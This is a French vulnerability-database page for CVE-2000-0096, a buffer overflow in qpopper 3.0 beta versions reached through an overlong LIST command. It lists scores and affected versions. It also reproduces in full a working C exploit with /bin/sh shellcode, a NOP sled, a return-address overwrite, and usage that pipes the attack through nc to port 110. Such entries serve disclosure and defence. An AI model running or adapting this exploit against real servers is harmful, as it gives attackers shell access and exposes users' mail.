CVE-2000-0096 : Détail

CVE-2000-0096

0.13%V4
Local
2000-02-08
04h00 +00:00
2004-04-20
07h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in qpopper 3.0 beta versions allows local users to gain privileges via a long LIST command.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19729

Date de publication : 2000-01-09 23h00 +00:00
Auteur : Zhodiac
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/948/info A remotely exploitable buffer-overflow vulnerability affects Qualcomm's 'qpopper' daemon. This issue allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. The problem lies in the code that handles the 'LIST' command available to logged-in users. By providing an overly long argument, an attacker may cause a buffer to overflow. As a result, the attacker can gain access with the user ID (UID) of the user whose account is being used for the attack and with the group ID (GID) mail. This will allow remote attackers to access the server itself and possibly (depending on how the computer is configured) to read other users' mail via the GID mail. /* * !Hispahack Research Team * http://hispahack.ccc.de * * By Zhodiac <zhodiac@softhome.net> * * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53) * Overflow at pop_list()->pop_msg() * * Tested: 3.0beta28 offset=0 * 3.0beta26 offset=0 * 3.0beta25 offset=0 * * #include <standar/disclaimer.h> * * This code is dedicated to my love [CrAsH]] and to all the people who * were raided in Spain in the last few days. * * Madrid 10/1/2000 * */ #include <stdio.h> #define BUFFERSIZE 1004 #define NOP 0x90 #define OFFSET 0xbfffd9c4 char shellcode[]= "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89" "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh"; void usage(char *progname) { fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname); exit(1); } int main(int argc, char **argv) { char *ptr,buffer[BUFFERSIZE]; unsigned long *long_ptr,offset=OFFSET; int aux; fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n"); fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n"); if (argc<3) usage(argv[0]); if (argc==4) offset+=atol(argv[3]); ptr=buffer; memset(ptr,0,sizeof(buffer)); memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16); ptr+=sizeof(buffer)-strlen(shellcode)-16; memcpy(ptr,shellcode,strlen(shellcode)); ptr+=strlen(shellcode); long_ptr=(unsigned long*)ptr; for(aux=0;aux<4;aux++) *(long_ptr++)=offset; ptr=(char *)long_ptr; *ptr='\0'; fprintf(stderr,"Buffer size: %d\n",strlen(buffer)); fprintf(stderr,"Offset: 0x%lx\n\n",offset); printf("USER %s\n",argv[1]); sleep(1); printf("PASS %s\n",argv[2]); sleep(1); printf("LIST 1 %s\n",buffer); sleep(1); printf("uname -a; id\n"); return(0); }

Products Mentioned

Configuraton 0

Qualcomm>>Qpopper >> Version 3.0

Qualcomm>>Qpopper >> Version 3.0beta1

    Qualcomm>>Qpopper >> Version 3.0beta2

      Qualcomm>>Qpopper >> Version 3.0beta3

        Qualcomm>>Qpopper >> Version 3.0beta4

          Qualcomm>>Qpopper >> Version 3.0beta5

            Qualcomm>>Qpopper >> Version 3.0beta6

              Qualcomm>>Qpopper >> Version 3.0beta7

                Qualcomm>>Qpopper >> Version 3.0beta8

                  Qualcomm>>Qpopper >> Version 3.0beta9

                    Qualcomm>>Qpopper >> Version 3.0beta10

                      Qualcomm>>Qpopper >> Version 3.0beta11

                        Qualcomm>>Qpopper >> Version 3.0beta12

                          Qualcomm>>Qpopper >> Version 3.0beta13

                            Qualcomm>>Qpopper >> Version 3.0beta14

                              Qualcomm>>Qpopper >> Version 3.0beta15

                                Qualcomm>>Qpopper >> Version 3.0beta16

                                  Qualcomm>>Qpopper >> Version 3.0beta17

                                    Qualcomm>>Qpopper >> Version 3.0beta18

                                      Qualcomm>>Qpopper >> Version 3.0beta19

                                        Qualcomm>>Qpopper >> Version 3.0beta20

                                          Qualcomm>>Qpopper >> Version 3.0beta21

                                            Qualcomm>>Qpopper >> Version 3.0beta22

                                              Qualcomm>>Qpopper >> Version 3.0beta23

                                                Qualcomm>>Qpopper >> Version 3.0beta24

                                                  Qualcomm>>Qpopper >> Version 3.0beta25

                                                    Qualcomm>>Qpopper >> Version 3.0beta26

                                                      Qualcomm>>Qpopper >> Version 3.0beta27

                                                        Qualcomm>>Qpopper >> Version 3.0beta28

                                                          Qualcomm>>Qpopper >> Version 3.0beta29

                                                            Références

                                                            http://www.securityfocus.com/bid/948
                                                            Tags : vdb-entry, x_refsource_BID